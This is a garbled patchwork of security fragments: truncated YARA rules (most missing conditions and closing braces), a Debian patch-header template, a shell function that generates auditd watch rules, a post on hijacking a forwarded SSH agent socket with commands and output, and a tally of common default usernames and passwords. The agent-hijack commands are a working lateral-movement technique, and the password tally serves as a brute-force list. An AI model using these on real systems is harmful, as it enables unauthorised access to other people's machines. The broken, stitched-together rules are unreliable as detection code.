import "elf"

rule enterpriseapps2 {
    meta:
        author = "Tim Brown @timb_machine"
        description = "Enterprise apps"
    strings:
        $db2 = "db2" nocase
        $oracle = "oracle" nocase
        $mysql = "mysql" nocase
import "elf"

rule enterpriseunix2 {
    meta:
        author = "Tim Brown @timb_machine"
        description = "Enterprise UNIX"
    strings:
        $aix = "aix" nocase
        $solaris = "solaris" nocase
        $hpux = "hpux" nocase
rule adonunix2 {
    meta:
        author = "Tim Brown @timb_machine"
        description = "AD on UNIX"
    strings:
        $quest = "/quest"
        $sss = "/sss"
        $pbis = "/pbis"
        $ipa = "/ipa"
        $samba = "/samba"
rule ciscotools {
    meta:
        author = "Tim Brown @timb_machine"
        description = "Cisco tools"
    strings:
        $labs = "labs.portcullis.co.uk"
        $portcullislabs = "portcullislabs"
        $CiscoCXSecurity = "CiscoCXSecurity"
        $timb_machine = "timb_machine"
        $pentestmonkey = "pentestmonkey"
Description: Accept environment changes.
 Accept environment changes during negotiation by the client.
Author: Tim Brown <github@timb.me.uk>
---
The information above should follow the Patch Tagging Guidelines, please
checkout http://dep.debian.net/deps/dep3/ to learn about the format. Here
are templates for supplementary fields that you might want to add:
Origin: <vendor|upstream|other>, <url of original patch>
rule aix {
    meta:
        author = "Tim Brown @timb_machine"
        description = "AIX binary"
    strings:
        $libca = "libc.a"
        $text = ".text"
        $data = ".data"
    condition:
        $libca and $text and $data
}
#!/bin/sh

# Emit one auditd file-watch rule ("-w <path> -p <perms> -k <key>") per
# path read from stdin. $1 is the permission set to audit (e.g. wa),
# $2 is the key the rules are tagged with.
generate_file_rule () {
    filepermissions="${1}"
    rulename="${2}"
    while read -r filename
    do
        printf -- "-w %s -p %s -k %s\n" "${filename}" "${filepermissions}" "${rulename}"
    done
}
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld
    461 root
    392
    160 admin
     94 default
     39 guest
     24 support
     21 user
     20 1234
     16 password
     15 12345